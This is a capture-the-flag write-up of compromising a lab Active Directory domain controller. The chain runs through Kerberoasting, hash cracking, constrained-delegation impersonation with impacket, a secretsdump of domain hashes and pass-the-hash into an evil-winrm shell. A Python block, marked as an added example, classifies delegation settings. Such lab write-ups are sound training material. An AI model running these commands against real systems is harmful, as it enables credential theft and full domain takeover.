Of these found usernames the one most likely to be the planted account must be #2: admCroccCrew
We can try psexec from impacket to see if we can get a shell from here
rob:CroccCrew/ $ impacket-psexec 'COOCTUS.CORP/Visitor:GuestLogin!'@10.10.145.144 -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.145.144.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'Home' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
Unfortunately we do not have a writable share that can be used, so no joy!
Sticking with the impacket tools though, can we do more with this? Let’s try GetUserSPNs to see if we can find a service account to abuse
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------------- -------- -------------------------- -------------------------- -----------
HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrained
And we retrieved a hash too
rob:CroccCrew/ $ cat TGS.txt
Let’s see if we can crack this now using john
rob:CroccCrew/ $ john TGS.txt -w=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
resetpassword (?)
1g 0:00:00:00 DONE (2021-09-24 00:16) 5.000g/s 1187Kp/s 1187Kc/s 1187KC/s rikelme..nichel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Excellent, we have new creds, password-reset:resetpassword
What can we do with this though? Cue a lot of research as my AD attack knowledge is woefully lacking! Found a very good youtube video here
- Going back over our findings so far highlights something that looked interesting
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------------- -------- -------------------------- -------------------------- -----------
HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrained
We can see a ‘constrained’ value in the ‘Delegation’ column
- This connects up with something we saw earlier in our LDAP enumeration. The account password-reset had a flag that no other domain user had, TRUSTED_TO_AUTH_FOR_DELEGATION
- Some more googling finds a good article on this
When constrained delegation is set on an account, two things happen under the covers:
- The userAccountControl attribute for the object gets updated with the “TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION” flag
and
all the pieces I would want to exploit constrained delegation:
- A compromised account configured with constrained delegation
- A target privileged account to impersonate when requesting access to the service
- Information on the machine hosting the service I’ll be gaining access to
So, we have a compromised account with constrained delegation. We could simply aim high and try impersonating the administrator account, and we know most things about the target machine, so let’s try using this information
First they use a tool called kekeo to get the ‘TGT’ - the “Ticket Granting Ticket”. We should be able to do the same thing with impacket again
rob:CroccCrew/ $ impacket-getTGT COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Saving ticket in password-reset.ccache
Ok, so far so good. Next they use this TGT to impersonate another user, again we have an impacket option for this
rob:CroccCrew/ $ impacket-getST -spn HTTP/dc.cooctus.corp -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user password-reset or initial TGT not forwardable
The SPN value is a bit of a guess; it is what we got in the output of our GetUserSPNs command earlier. Back to Google again!
We find another tool, findDelegation, that shows us exactly what constrained delegation rights we have
rob:CroccCrew/ $ impacket-findDelegation -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
AccountName AccountType DelegationType DelegationRightsTo
-------------- ----------- ---------------------------------- -----------------------------------
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS.CORP
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP
password-reset Person Constrained w/ Protocol Transition oakley/DC
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS
password-reset Person Constrained w/ Protocol Transition oakley/DC/COOCTUS
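To make the attributes behind these rows concrete, here is an added Python example (it is not from the write-up and not impacket's findDelegation code) that classifies delegation from userAccountControl and msDS-AllowedToDelegateTo the way findDelegation presents it, and adds the two checks worth running before a getST attempt: that the SPN you ask for is actually in the allowed list (HTTP/dc.cooctus.corp above was not, hence KDC_ERR_BADOPTION), and that the user you impersonate is not flagged "sensitive and cannot be delegated" or a member of Protected Users. The sample records are constructed; only password-reset mirrors the findings above, and websvc and legacy$ are hypothetical.

```python
"""Delegation triage from LDAP attributes (added example; not from the
write-up or from impacket).  Given userAccountControl and
msDS-AllowedToDelegateTo for each account, reproduce the DelegationType
classification and add two pre-flight checks for an S4U attack."""

# userAccountControl bits (ADS_USER_FLAG_ENUM)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
NORMAL_ACCOUNT = 0x200

# Constructed sample records; only password-reset mirrors the write-up's output.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "password-reset",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["oakley/DC.COOCTUS.CORP/COOCTUS.CORP", "oakley/DC.COOCTUS.CORP",
                                  "oakley/DC", "oakley/DC.COOCTUS.CORP/COOCTUS", "oakley/DC/COOCTUS"]},
    {"sAMAccountName": "websvc",          # hypothetical: constrained, no protocol transition
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["CIFS/FILES01.COOCTUS.CORP"]},
    {"sAMAccountName": "legacy$",         # hypothetical: unconstrained delegation
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "Visitor",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]


def delegation_type(uac, allowed_to):
    """DelegationType in findDelegation's vocabulary, or None if none is configured."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "Unconstrained"
    if allowed_to:
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "Constrained w/ Protocol Transition"
        return "Constrained"
    return None


def triage(accounts):
    """One (account, type, target SPN) row per allowed SPN, like findDelegation prints."""
    rows = []
    for acct in accounts:
        allowed = acct.get("msDS-AllowedToDelegateTo", [])
        dtype = delegation_type(acct["userAccountControl"], allowed)
        if dtype is None:
            continue
        for spn in (allowed or ["N/A"]):
            rows.append((acct["sAMAccountName"], dtype, spn))
    return rows


def spn_allowed(requested_spn, allowed_to):
    """S4U2proxy only succeeds for an SPN listed in msDS-AllowedToDelegateTo
    (compared case-insensitively); anything else gets KDC_ERR_BADOPTION."""
    return requested_spn.upper() in {s.upper() for s in allowed_to}


def can_impersonate(target_uac, in_protected_users=False):
    """S4U2self returns a non-forwardable ticket for targets flagged NOT_DELEGATED
    or in Protected Users, so S4U2proxy for them fails even with protocol transition."""
    return not (target_uac & NOT_DELEGATED) and not in_protected_users


if __name__ == "__main__":
    for row in triage(SAMPLE_ACCOUNTS):
        print("%-16s %-36s %s" % row)
    pw_reset = SAMPLE_ACCOUNTS[0]["msDS-AllowedToDelegateTo"]
    print("HTTP/dc.cooctus.corp allowed:  ", spn_allowed("HTTP/dc.cooctus.corp", pw_reset))
    print("oakley/DC.COOCTUS.CORP allowed:", spn_allowed("oakley/DC.COOCTUS.CORP", pw_reset))
```

The five rows for one account are simply the five strings Windows stored in msDS-AllowedToDelegateTo; any of them is a valid -spn value, and none of them is HTTP/dc.cooctus.corp.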
When we try this new information in place of the SPN name we seem to get a little further
rob:CroccCrew/ $ impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Excellent, with the administrator ticket we should now be able to extract the admin hash with secretsdump
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
Of course, nothing is ever easy is it!
Turning on debug and specifying the target host gives us a little more information
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass -debug COOCTUS.CORP/administrator@10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/COOCTUS.CORP@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache.
[+] Trying to connect to KDC at 10.10.145.144
[+] Trying to connect to KDC at 10.10.145.144
[+] SMBConnection didn't work, hoping Kerberos will help (Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid))
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[+] Exiting NTDSHashes.dump() because SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)
[*] Cleaning up...
These lines are interesting
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
So is the address of the Domain Controller written into the ticket? Or the name, rather, I guess? The DC name used in the getST command was DC.COOCTUS.CORP, so perhaps if we add that to our hosts file? In a real-life scenario it would of course be resolvable by DNS.
What the debug output shows is impacket looking in the cache for CIFS/<target> and then, with AnySPN, for any ticket whose host part matches the target. A ticket for oakley/DC.COOCTUS.CORP can never match an IP address, but it does match the hostname, and the DC accepts the substituted service class because every SPN on the host is protected by the same machine-account key.
rob:CroccCrew/ $ impacket-secretsdump -k -no-pass DC.COOCTUS.CORP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xe748a0def7614d3306bd536cdc51bebe
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
COOCTUS\DC$:plain_password_hex:20e32c4c2471c0730dd322a4cd1068bebb17034932676917c1375b18d0fb2ab5710da01b79a6bef1a5a88ffc6946b710114ea28826d1dc889b67d29c4492ce3f0cbff2f11c8f13237832264563ae3ea81d53d9abd4c33f71d123df4a7f187af042e0c5b8d30ef19d0f038d855a7bc12f5f032a03bc13b3d2a2af91adfeb0391e6410ef4922e6a56d1b94ca9ef6ccbec53b7c685b091f2b60374529d85f79a0b0ccbaefb7fb0f61d623fa13a490ac385a0943b31ff6d4f604ad6569c593f9b112aa8fa4d746a4001d91ebf8b0dcfbd3cf5363ea370a347ea7aaf55e27f359f621986ee488059251efefee4b9c790910ea
COOCTUS\DC$:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdadf91990ade51602422e8283bad7a4771ca859b
dpapi_userkey:0x95ca7d2a7ae7ce38f20f1b11c22a05e5e23b321b
[*] NL$KM
0000 D5 05 74 5F A7 08 35 EA EC 25 41 2C 20 DC 36 0C ..t_..5..%A, .6.
0010 AC CE CB 12 8C 13 AC 43 58 9C F7 5C 88 E4 7A C3 .......CX..\..z.
0020 98 F2 BB EC 5F CB 14 63 1D 43 8C 81 11 1E 51 EC ...._..c.C....Q.
0030 66 07 6D FB 19 C4 2C 0E 9A 07 30 2A 90 27 2C 6B f.m...,...0*.',k
NL$KM:d505745fa70835eaec25412c20dc360caccecb128c13ac43589cf75c88e47ac398f2bbec5fcb14631d438c81111e51ec66076dfb19c42c0e9a07302a90272c6b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e:::
COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1:::
COOCTUS.CORP\mark:1115:aad3b435b51404eeaad3b435b51404ee:0b5e04d90dcab62cc0658120848244ef:::
COOCTUS.CORP\Jeff:1116:aad3b435b51404eeaad3b435b51404ee:1004ed2b099a7c8eaecb42b3d73cc9b7:::
COOCTUS.CORP\Spooks:1117:aad3b435b51404eeaad3b435b51404ee:07148bf4dacd80f63ef09a0af64fbaf9:::
COOCTUS.CORP\Steve:1119:aad3b435b51404eeaad3b435b51404ee:2ae85453d7d606ec715ef2552e16e9b0:::
COOCTUS.CORP\Howard:1120:aad3b435b51404eeaad3b435b51404ee:65340e6e2e459eea55ae539f0ec9def4:::
COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a:::
COOCTUS.CORP\Fawaz:1122:aad3b435b51404eeaad3b435b51404ee:d342c532bc9e11fc975a1e7fbc31ed8c:::
COOCTUS.CORP\karen:1123:aad3b435b51404eeaad3b435b51404ee:e5810f3c99ae2abb2232ed8458a61309:::
COOCTUS.CORP\cryillic:1124:aad3b435b51404eeaad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
COOCTUS.CORP\yumeko:1125:aad3b435b51404eeaad3b435b51404ee:c0e0e39ac7cab8c57c3543c04c340b49:::
COOCTUS.CORP\pars:1126:aad3b435b51404eeaad3b435b51404ee:fad642fb63dcc57a24c71bdc47e55a05:::
COOCTUS.CORP\kevin:1127:aad3b435b51404eeaad3b435b51404ee:48de70d96bf7b6874ec195cd5d389a09:::
COOCTUS.CORP\jon:1128:aad3b435b51404eeaad3b435b51404ee:7f828aaed37d032d7305d6d5016ccbb3:::
COOCTUS.CORP\Varg:1129:aad3b435b51404eeaad3b435b51404ee:7da62b00d4b258a03708b3c189b41a7e:::
COOCTUS.CORP\evan:1130:aad3b435b51404eeaad3b435b51404ee:8c4b625853d78e84fb8b3c4bcd2328c5:::
COOCTUS.CORP\Ben:1131:aad3b435b51404eeaad3b435b51404ee:1ce6fec89649608d974d51a4d6066f12:::
COOCTUS.CORP\David:1132:aad3b435b51404eeaad3b435b51404ee:f863e27063f2ccfb71914b300f69186a:::
COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1:::
[*] Kerberos keys grabbed
--snip--
[*] Cleaning up...
We should be able to use evil-winrm now to pass this administrator hash and get a shell (finally!!). Only the NT half is needed: each line is lmhash:nthash, and aad3b435b51404eeaad3b435b51404ee is just the empty LM hash, so we pass the part after the final ‘:’
rob:CroccCrew/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.145.144 -u administrator -H 'add41095f1fb0405b32f70a489de022d' -n
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cooctus\administrator
We use -n to specify no colours, as these often mess up the command prompt
Backtracking as Administrator
As we’ve jumped here straight to administrator (our route to a foothold was SO long and most probably not the intended method), we have to backtrack now to find the flags for the other key users
We can start with a quick search for the usual suspect
*Evil-WinRM* PS C:\Users\admCroccCrew> Get-Childitem -Path C:\ -Include *user*.txt* -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Shares\Home
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2021 8:14 PM 17 user.txt
*Evil-WinRM* PS C:\Users\admCroccCrew> type C:\Shares\Home\user.txt
THM{REDACTED}
Ahh, that’s just the same flag again in the SMB share! However we do find some more useful files in that same directory (which presumably with the appropriate user access rights we could have seen via SMB)
*Evil-WinRM* PS C:\Shares\Home> dir
Directory: C:\Shares\Home
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/8/2021 12:38 PM 28 priv-esc-2.txt
-a---- 6/7/2021 8:08 PM 22 priv-esc.txt
-a---- 6/7/2021 8:14 PM 17 user.txt
So we can get #3
*Evil-WinRM* PS C:\Shares\Home> cat priv-esc.txt
THM{0n-Y0ur-Way-t0-DA}
And #4
*Evil-WinRM* PS C:\Shares\Home> cat priv-esc-2.txt
THM{Wh4t-t0-d0...Wh4t-t0-d0}
Lastly let’s do a search again for the root flag, #5
*Evil-WinRM* PS C:\Shares\Home> Get-Childitem -Path / -Include root.txt -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\PerfLogs\Admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2021 8:07 PM 22 root.txt
And we finish the box with
*Evil-WinRM* PS C:\Shares\Home> type C:\PerfLogs\Admin\root.txt
THM{REDACTED}
NB: Reading through the writeups after the event, mainly to see if there was a more intended route than going directly to administrator, I found that one of the writeups (by chrismeistre) had a great link that’s worth noting here for future reference. Also below is another link worth reading, cited by the first author as their main reference (also a perfect domain name! 😄)